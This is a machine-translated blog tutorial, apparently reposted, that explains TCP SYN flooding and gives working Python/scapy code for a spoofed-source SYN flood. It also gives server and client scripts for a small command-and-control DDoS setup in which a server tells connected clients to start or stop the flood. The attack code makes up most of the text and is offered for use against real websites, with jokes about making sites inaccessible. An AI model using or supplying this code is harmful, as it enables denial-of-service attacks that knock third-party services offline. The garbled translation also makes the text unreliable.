background :

In the network transport layer , Generally used TCP agreement , If you want to establish a connection , The client will send it first syn Package request , Server reception , After receiving , And then pass it to the client ack,syn package , This is the time , The client responds again , Return ack package . But the problem is , If I'm a client , Send only one request syn package , And then the third handshake , No more back ack package , Is the server waiting ?

In the waiting time , Can I forge more requests , As a result, the resources of the server are continuously consumed , Then until the server stops serving ?

This kind of attack is syn syn flood .


python in scapy Library syn syn flood :
python3 Installation mode : sudo pip3 install scapy-python3
be careful :scapy The code for the library must run in the root Under authority


Basic Usage :
from scapy.all import * #
Define a syn package , The format is as follows :IP()/TCP(),IP Medium src For their own forgery ip,dst As a goal ip, #
TCP Medium dport Is the target port number , It is common in the network 80,flages=‘S’ there s What is set on behalf of syn package pkt =
IP(src="",dst="")/TCP(dport=80,flags="S") #
Send package , Direct use send send(pkt)

Let me give you an example :
#!/usr/bin/env python3 import random import socket import time from scapy.all
import * # definition syn Flood function ,tgt As a goal ip,dPort Is the target port def synFlood(tgt,dPort): # Forgery at will first 4 individual ip address
srcList = ['','','', ''] # Select any port number for
sPort in range(1024, 65535): index = random.randrange(4) #
Similar to the code structure above IP/TCP package , then send ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer =
TCP(sport=sPort, dport=dPort,flags='S') packet = ipLayer/tcpLayer send(packet)
domain = "" # Define the domain name you want to attack , Baidu is not recommended , Don't blame me for not reminding tgt =
socket.gethostbyname(domain) # utilize socket Method to get the domain name ip address , Namely dns analysis print(tgt) #
You can print it out and have a look dPort = 80 # Common port number of network transmission synFlood(tgt,dPort) # call syn Flood function , Then send it syn package #
After sending, you can check the response speed of the server . It's usually sent for a few minutes , This site is not accessible # The premise is that the site is a mess .. ha-ha
DDoS attack

and DDoS What is the attack ? In fact, it is similar to the above one syn Torrent , just DDoS It adopts multiple clients under the command of the server , Together like a website attack , Something like this

Implementation principle and syn It's the same , It's just that the server can directly control the client and then issue the request .

The specific server and client code I will directly post

Server :
import socket import argparse import threading socketList = [] # Send commands to all clients
def sendCmd(cmd): print('Send command....') for sock in socketList:
sock.send(cmd.encode()) # Waiting for connection , Add the established connection to the socketList In the list def waitConnect(s):
while True: sock, addr = s.accept() if sock not in socketList:
socketList.append(sock) def main(): # establish tcp Server s =
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1) # Set port reuse
s.bind(('',58868)) s.listen(1024) # Thread creation wait for connection request t =
threading.Thread(target=waitConnect, args=(s,)) t.start() print("Wait at least
a client connection!") while not len(socketList): # No connection, wait pass print("It
has been a client connection") while True: print('='*50) # Command format print('The
command format:"#-H -p xxxx -c start"') # Waiting for input command cmd_str =
input('please input cmd:') if len(cmd_str): if cmd_str[0] == '#':
sendCmd(cmd_str) if __name__ == '__main__': main()
client :
import argparse import socket import sys import os from multiprocessing import
Process import random from scapy.all import * curProcess = None #
SYN syn flood , It's the first string of code , direct copy Just come here def synFlood(tgt, dPort): print("="*100)
print("The syn flood is running") print('='*100) srcList = ['',
'', '', ''] # Any port number for sPort in range(1024,
65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt)
tcpLayer = TCP(sport=sPort, dport=dPort, flags='S') packet = ipLayer / tcpLayer
send(packet) def cmdHandle(sock, parser): global curProcess while True: data =
sock.recv(1024).decode() if len(data) == 0: print('The data is empty') return
if data[0] == '#': try: # Parse command options = parser.parse_args(data[1:].split())
m_host = m_port = options.port m_cmd = options.cmd # print(m_cmd)
# DDOS Start command if m_cmd.lower() == 'start': if curProcess !=None and
curProcess.is_alive(): curProcess.terminate() curProcess = None
os.system('clear') print('The synFlood is start') p = Process(target=synFlood,
args = (m_host, m_port)) p.start() curProcess = p elif m_cmd.lower() == 'stop':
if curProcess.is_alive(): curProcess.terminate() os.system('clear') except:
print("Failed to perform the command") def main(): # Add commands to be parsed , It's the command sent by the server #
Command format :"#-H -p xxxx -c start" p = argparse.ArgumentParser()
p.add_argument('-H', dest='host', type=str) p.add_argument('-p',
dest='port',type=int) p.add_argument('-c', dest='cmd', type=str) print("*" *
40) try: # establish socket object s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #
Here because it's local , So connected ip Address is local ip address, Port is the server port s.connect(('',58868))
print('To connected server was success') print("=" * 40) # Processing commands cmdHandle(s, p)
except Exception as e: print('The network connected failed') print('please
restart the script') sys.exit(0) if __name__ == '__main__': main()
Then you can start the server locally , Then open the client to achieve ha

Remember to use it sudo Ha

When you see that the client is like this

ha-ha , It's done .


however , Its essence is to follow syn Like a torrent . It's just one more package .





©2019-2020 Toolsou All rights reserved,
The 11th Blue Bridge Cup python The real topic of the University Group National Games JavaSwing To achieve a simple Lianliankan games 【Spring Source code analysis 】42-@Conditional Detailed explanation element-ui Step on pit record 2019PHP Interview questions ( Continuously updated )PHPJava Misunderstanding —— Method overloading is a manifestation of polymorphism ? First issue 500 100 million , Set up a new Department , What is Tencent going to do ? Google chrome The browser can't open the web page , But what if other browsers can open it ? Regression of dependent variable order categories (R language )【Golang Basic series 10 】Go language On conditional sentences if